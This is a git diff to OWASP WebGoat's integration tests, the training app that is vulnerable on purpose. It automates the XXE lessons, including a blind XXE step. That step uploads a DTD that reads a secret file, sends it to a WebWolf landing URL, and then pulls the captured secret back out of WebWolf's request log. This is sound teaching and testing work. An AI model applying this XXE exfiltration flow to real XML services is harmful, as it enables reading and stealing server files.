diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
index d896b1c80..4089e3b77 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/IntegrationTest.java
@@ -3,6 +3,7 @@ package org.owasp.webgoat;
import io.restassured.RestAssured;
import io.restassured.config.RestAssuredConfig;
import io.restassured.config.SSLConfig;
+import io.restassured.http.ContentType;
import lombok.Getter;
import org.hamcrest.CoreMatchers;
import org.junit.After;
@@ -210,7 +211,8 @@ public abstract class IntegrationTest {
.config(restConfig)
.cookie("JSESSIONID", getWebGoatCookie())
.get(url("service/lessonoverview.mvc"))
- .then()
+ .then()
+ .log().all()
.statusCode(200).extract().jsonPath().getList("solved"), CoreMatchers.everyItem(CoreMatchers.is(true)));
Assert.assertThat(RestAssured.given()
@@ -222,4 +224,20 @@ public abstract class IntegrationTest {
.statusCode(200).extract().jsonPath().getList("assignment.path"), CoreMatchers.everyItem(CoreMatchers.startsWith(prefix)));
}
+
+ public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
+ Assert.assertThat(
+ RestAssured.given()
+ .when()
+ .config(restConfig)
+ .contentType(contentType)
+ .cookie("JSESSIONID", getWebGoatCookie())
+ .body(body)
+ .post(url)
+ .then()
+ .statusCode(200)
+ .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
+ }
+
}
+
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
index ab6e3350c..86f2eb56c 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/XXETest.java
@@ -5,8 +5,6 @@ import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
-import org.hamcrest.CoreMatchers;
-import org.junit.Assert;
import org.junit.Test;
import io.restassured.RestAssured;
@@ -16,7 +14,7 @@ public class XXETest extends IntegrationTest {
private static final String xxe3 = "]>&xxe;test";
private static final String xxe4 = "]>&xxe;test";
- private static final String dtd7 = "\">%all;";
+ private static final String dtd7 = "\">%all;";
private static final String xxe7 = "%remote;]>test&send;";
private String webGoatHomeDirectory = System.getProperty("user.dir").concat("/target/.webgoat");
@@ -28,15 +26,33 @@ public class XXETest extends IntegrationTest {
startLesson("XXE");
checkAssignment(url("/WebGoat/xxe/simple"),ContentType.XML,xxe3,true);
+
checkAssignment(url("/WebGoat/xxe/content-type"),ContentType.XML,xxe4,true);
- Path webWolfFilePath = Paths.get(webwolfFileDir);
+
+
+
+ checkAssignment(url("/WebGoat/xxe/blind"),ContentType.XML,""+getSecret()+"",true );
+
+ checkResults("xxe/");
+
+ }
+
+ /**
+ * This performs the steps of the exercise before the secret can be committed in the final step.
+ * @return
+ * @throws IOException
+ */
+ private String getSecret() throws IOException {
+
+ //remove any left over DTD
+ Path webWolfFilePath = Paths.get(webwolfFileDir);
if (webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")).toFile().exists()) {
- System.out.println("delete file");
Files.delete(webWolfFilePath.resolve(Paths.get(getWebgoatUser(),"blind.dtd")));
}
String secretFile = webGoatHomeDirectory.concat("/XXE/secret.txt");
- String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("")).replace("SECRET", secretFile);
- System.out.println(dtd7String);
+ String dtd7String = dtd7.replace("WEBWOLFURL", webWolfUrl("/landing")).replace("SECRET", secretFile);
+
+ //upload DTD
RestAssured.given()
.when()
.config(restConfig)
@@ -46,28 +62,20 @@ public class XXETest extends IntegrationTest {
.then()
.extract().response().getBody().asString();
-
- String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/WebWolf/files")).replace("USERNAME", getWebgoatUser());
- System.out.println(xxe7String);
+ //upload attack
+ String xxe7String = xxe7.replace("WEBWOLFURL", webWolfUrl("/files")).replace("USERNAME", getWebgoatUser());
checkAssignment(url("/WebGoat/xxe/blind?send=test"),ContentType.XML,xxe7String,false );
- //checkResults("/XXE/");
-
- }
-
- public void checkAssignment(String url, ContentType contentType, String body, boolean expectedResult) {
- Assert.assertThat(
- RestAssured.given()
- .when()
- .config(restConfig)
- .contentType(contentType)
- .cookie("JSESSIONID", getWebGoatCookie())
- .body(body)
- .post(url)
- .then()
- .log().all()
- .statusCode(200)
- .extract().path("lessonCompleted"), CoreMatchers.is(expectedResult));
+ //read results from WebWolf
+ String result = RestAssured.given()
+ .when()
+ .config(restConfig)
+ .cookie("WEBWOLFSESSION", getWebWolfCookie())
+ .get(webWolfUrl("/WebWolf/requests"))
+ .then()
+ .extract().response().getBody().asString();
+ result = result.substring(result.lastIndexOf("WebGoat 8.0 rocks... ("),result.lastIndexOf("WebGoat 8.0 rocks... (")+33);
+ return result;
}
}
diff --git a/webgoat-integration-tests/src/test/resources/application-inttest.properties b/webgoat-integration-tests/src/test/resources/application-inttest.properties
index 9c388c7ca..4286e914f 100644
--- a/webgoat-integration-tests/src/test/resources/application-inttest.properties
+++ b/webgoat-integration-tests/src/test/resources/application-inttest.properties
@@ -1,6 +1,10 @@
+#In order to run tests a known temp directory is preferred
+#that is why these values are used
+
webgoat.user.directory=${user.dir}/target/.webgoat
webgoat.server.directory=${user.dir}/target/.webgoat
-
webwolf.fileserver.location=${user.dir}/target/webwolf-fileserver
-spring.jpa.hibernate.ddl-auto=create-drop
\ No newline at end of file
+#database will get deleted for every mvn clean install
+#as these extra properties are read by WebGoat and WebWolf the drop of the tables
+#was not helpful.
\ No newline at end of file